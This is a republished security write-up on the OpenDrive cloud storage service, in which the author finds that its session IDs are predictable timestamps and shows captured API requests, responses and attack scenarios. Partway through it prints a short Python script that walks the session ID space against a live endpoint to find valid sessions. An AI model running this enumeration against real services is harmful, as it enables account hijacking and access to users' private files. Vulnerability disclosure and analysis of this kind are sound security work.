2025-01-26 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 05/31 Report
OpenDrive cloud storage platform session mechanism vulnerability: an example analysis
Many newcomers are unclear about this kind of session weakness, so the following walks through a real case in detail for anyone who wants to learn from it.
When comparing cloud storage solutions recently, I was surprised to find that many companies still offer unlimited cloud storage plans, among them OpenDrive (not to be confused with the OpenDRIVE format specification), which offers unlimited storage for individuals, businesses and corporations.
In addition to traditional cloud storage, OpenDrive also provides backup and content management for customers through software clients and mobile apps. According to OpenDrive's official website, many well-known companies, including T-Mobile, Ancesty.com and REMAX, are among its customers.
Discovery
I signed up for an OpenDrive trial account through the web client to test it. After uploading some test files, I noticed that OpenDrive's website is built on WordPress, with obvious signs of customization in many places, including styling, login and API usage.
Through an HTTP proxy I also noticed that, throughout the storage workflow, the client calls two API servers: one whose hostname starts with www and authenticates with cookies, and one whose hostname starts with web and authenticates with a separate session ID, as follows:
GET https://web.opendrive.com/api/v1/download/file.json/ABC123***REMOVED***?session_id=1517592191112474005&inline=0&preview=1 HTTP/1.1
Host: web.opendrive.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Note the value in session_id in the GET request above:
session_id=1517592191 112474005
This value looks a lot like a Unix timestamp, and is most likely derived from the time of the user's initial login request, which is not good. In fact, the first 10 digits correspond to the date/time at which my account first logged in.
The remaining 9 digits of the session_id are probably just a more precise component of the same login time, such as the microseconds produced by a server-side function like PHP's microtime. I verified this by making a series of login requests and comparing the generated session_id values, which, as predicted, were consecutive time values.
Next, I decided to look at how this session mechanism works across OpenDrive's products and what it means for their security. Because the web client exercises only a limited part of this API, I installed the OpenDrive Android app on my test phone.
After pointing my test phone at an HTTP proxy, I logged into my OpenDrive account and started browsing files, moving folders and accessing other information in my account. All of the API servers turned out to use the same vulnerable session_id generation mechanism, as in the following request:
GET https://ai2.opendrive.com/api/v1/users/info.json/1517592191112474005 HTTP/1.1
session_id: 1517592191112474005
Host: ai2.opendrive.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.7.0
Sending the above request returns the following JSON response:
{ "UserID": 1853669, "AccessUserID": 0, "UserName": "***REMOVED***", "UserFirstName": "***REMOVED***", "UserLastName": "***REMOVED***", "PrivateKey": "***REMOVED***", "Trial": "0", "UserSince": "1517591533", "BwResetLast": "1517591533", "AccType": "1", "MaxStorage": "5120", "StorageUsed": "361144", "BwMax": "1024", "BwUsed": "0", "FVersioning": "0", "FVersions": "10", "DailyStat": 0, "UserLang": "en", "MaxFileSize": "102400", "Level": "1", "UserPlan": "Basic Plan", "TimeZone": "America\/Los_Angeles", "MaxAccountUsers": "1", "IsAccountUser": 0, "CompanyName": "", "Email": "***REMOVED***", "Phone": "", "Avatar": null, "AvatarColor": "a38f84", "AdminMode": 1, "DueDate": "0000-00-00", "WebLink": "", "PublicProfiles": 0, "RootFolderPermission": 2, "CanChangePwd": 1, "IsPartner": 0, "Partner": "OpenDrive", "SupportUrl": "http:\/\/support.opendrive.com", "PartnerUsersDomain": ".opendrive.com", "Suspended": false, "Affiliation": "0", "UserUID": "5ac61707c2ee6"}
Again, this shows that every part of the application is governed by a highly predictable, sequential "session" value. The following is an example of a request for the contents of a folder:
GET https://ai2.opendrive.com/api/v1/folder/list.json/1517592191112474005/NjlfMTA2NzgyNF93RjZaUw?last_request_time=0&offset=0 HTTP/1.1
session_id: 1517592191112474005
Host: ai2.opendrive.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/3.7.0
The response was as follows:
{ "DirUpdateTime": "1522940036", "Name": "Pictures", "ParentFolderID": "NjlfMF93RjZaUw", "DirectFolderLink": "https:\/\/od.lk\/fl\/NjlfMTA2NzgyNF8", "ResponseType": 1, "Folders": [], "Files": [{ "FileId": "NjlfNzU3MTg2OV9RRDgxUA", "Name": "1337.jpg", "GroupID": 0, "Extension": "jpg", "Size": "5289", "Views": "0", "Version": "", "Downloads": "1", "DateModified": "1522940033", "Access": "2", "Link": "https:\/\/od.lk\/f\/NjlfNzU3MTg2OV8", "DownloadLink": "https:\/\/od.lk\/d\/NjlfNzU3MTg2OV8\/1337.jpg", "StreamingLink": "https:\/\/od.lk\/s\/NjlfNzU3MTg2OV8\/1337.jpg", "TempStreamingLink": "https:\/\/ai2.opendrive.com\/api\/download\/file.json\/NjlfNzU3MTg2OV8?inline=1", "ThumbLink": "https:\/\/ai2.opendrive.com\/api\/file\/thumb.json\/NjlfNzU3MTg2OV9RRDgxUA?session_id=19ebbbef64d8a5404cc0b16603cea3de659c607a23ae639986d5e5c477f6b5e8", "Password": "", "EditOnline": 1 }, { "FileId": "NjlfNzU3MTg3MF9ZQ3NDYg", "Name": "test.jpg", "GroupID": 0, "Extension": "jpg", "Size": "51756", "Views": "0", "Version": "", "Downloads": "0", "DateModified": "1522940034", "Access": "2", "Link": "https:\/\/od.lk\/f\/NjlfNzU3MTg3MF8", "DownloadLink": "https:\/\/od.lk\/d\/NjlfNzU3MTg3MF8\/test.jpg", "StreamingLink": "https:\/\/od.lk\/s\/NjlfNzU3MTg3MF8\/test.jpg", "TempStreamingLink": "https:\/\/ai2.opendrive.com\/api\/download\/file.json\/NjlfNzU3MTg3MF8?inline=1", "ThumbLink": "https:\/\/ai2.opendrive.com\/api\/file\/thumb.json\/NjlfNzU3MTg3MF9ZQ3NDYg?session_id=19ebbbef64d8a5404cc0b16603cea3de659c607a23ae639986d5e5c477f6b5e8", "Password": "", "EditOnline": 1 }]}
Note that, through this analysis, I found that under this session mechanism any user account in the OpenDrive system can be hijacked, and its private files read or destroyed, with the simple script below. It is hard to describe this as a mere vulnerability rather than a fundamental design flaw.
import requests

url = "https://ai2.opendrive.com/api/v1/users/info.json"
session = 1517592191112474005
# Walk the sequential session_id space downwards from a known value;
# a 200 response means the ID belongs to a live session.
while True:
    f_url = "{}/{}".format(url, session)
    r = requests.get(f_url)
    if r.status_code == 200:
        print(f_url)
    session -= 1
Exploit scenarios
The risks of this session mechanism are obvious. There are two main attack scenarios: an attacker with moderate resources can easily discover other valid user sessions in the system, and a targeted attack against a single user requires only the approximate login time of that user, which narrows the range of session values the attacker has to search. Other risks:
Sessions don't expire, and the OpenDrive sessions I tested in February are still valid in March;
Each login generates a new session, which also means that multiple session entries exist for any given user;
The vulnerable session mechanism exists not only in the Android app but also in the web and desktop clients, which means that practically all OpenDrive users are affected.
It is unclear how many of these sessions are still live after OpenDrive's mitigations, but it was certainly a security threat.
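As an added illustration (not code from the original post or from OpenDrive), the following Python decodes a session_id of the 19-digit structure described above, checks whether two IDs from consecutive logins are adjacent in time the way the author observed, bounds how many IDs fall inside a known login window (the "narrowed scope" risk above), and shows what a CSPRNG-based token looks like instead. The second login value and the epoch window are constructed assumptions.

```python
import re
import secrets
from datetime import datetime, timezone

# The page's own 19-digit, timestamp-style session_id (not a live session).
FIRST_LOGIN = "1517592191112474005"
# Constructed: a second ID as a login 59 seconds later would produce under this scheme.
SECOND_LOGIN = "1517592250000000000"

# Assumed plausible epoch window for a live service (~2014 .. ~2030);
# a 10-digit prefix outside it is not treated as a timestamp.
EPOCH_LOW, EPOCH_HIGH = 1_400_000_000, 1_900_000_000


def decode_timestamp_session(session_id):
    """Return {'login_time', 'sub_second'} if session_id looks like
    <10-digit Unix epoch><9-digit sub-second counter>, otherwise None."""
    if not re.fullmatch(r"\d{19}", session_id):
        return None
    epoch, sub = int(session_id[:10]), int(session_id[10:])
    if not EPOCH_LOW <= epoch <= EPOCH_HIGH:
        return None
    return {"login_time": datetime.fromtimestamp(epoch, tz=timezone.utc),
            "sub_second": sub}


def are_sequential(a, b, max_gap_seconds=60):
    """True if both IDs decode as timestamps whose login times lie within
    max_gap_seconds of each other, i.e. they look like consecutive logins."""
    da, db = decode_timestamp_session(a), decode_timestamp_session(b)
    if da is None or db is None:
        return False
    gap = abs((db["login_time"] - da["login_time"]).total_seconds())
    return gap <= max_gap_seconds


def candidate_space(window_seconds):
    """Upper bound on IDs inside a login-time window: each second of the
    scheme spans at most 10**9 suffix values (a risk figure, nothing more)."""
    return window_seconds * 10**9


def secure_session_id():
    """The shape a session token should have: 32 bytes from the OS CSPRNG,
    256 bits of entropy and no relation to login time."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    info = decode_timestamp_session(FIRST_LOGIN)
    print("login time:", info["login_time"].isoformat(), "suffix:", info["sub_second"])
    print("consecutive logins?", are_sequential(FIRST_LOGIN, SECOND_LOGIN))
    print("IDs in a 60 s window:", candidate_space(60))
    print("secure token decodes as timestamp:", decode_timestamp_session(secure_session_id()))
```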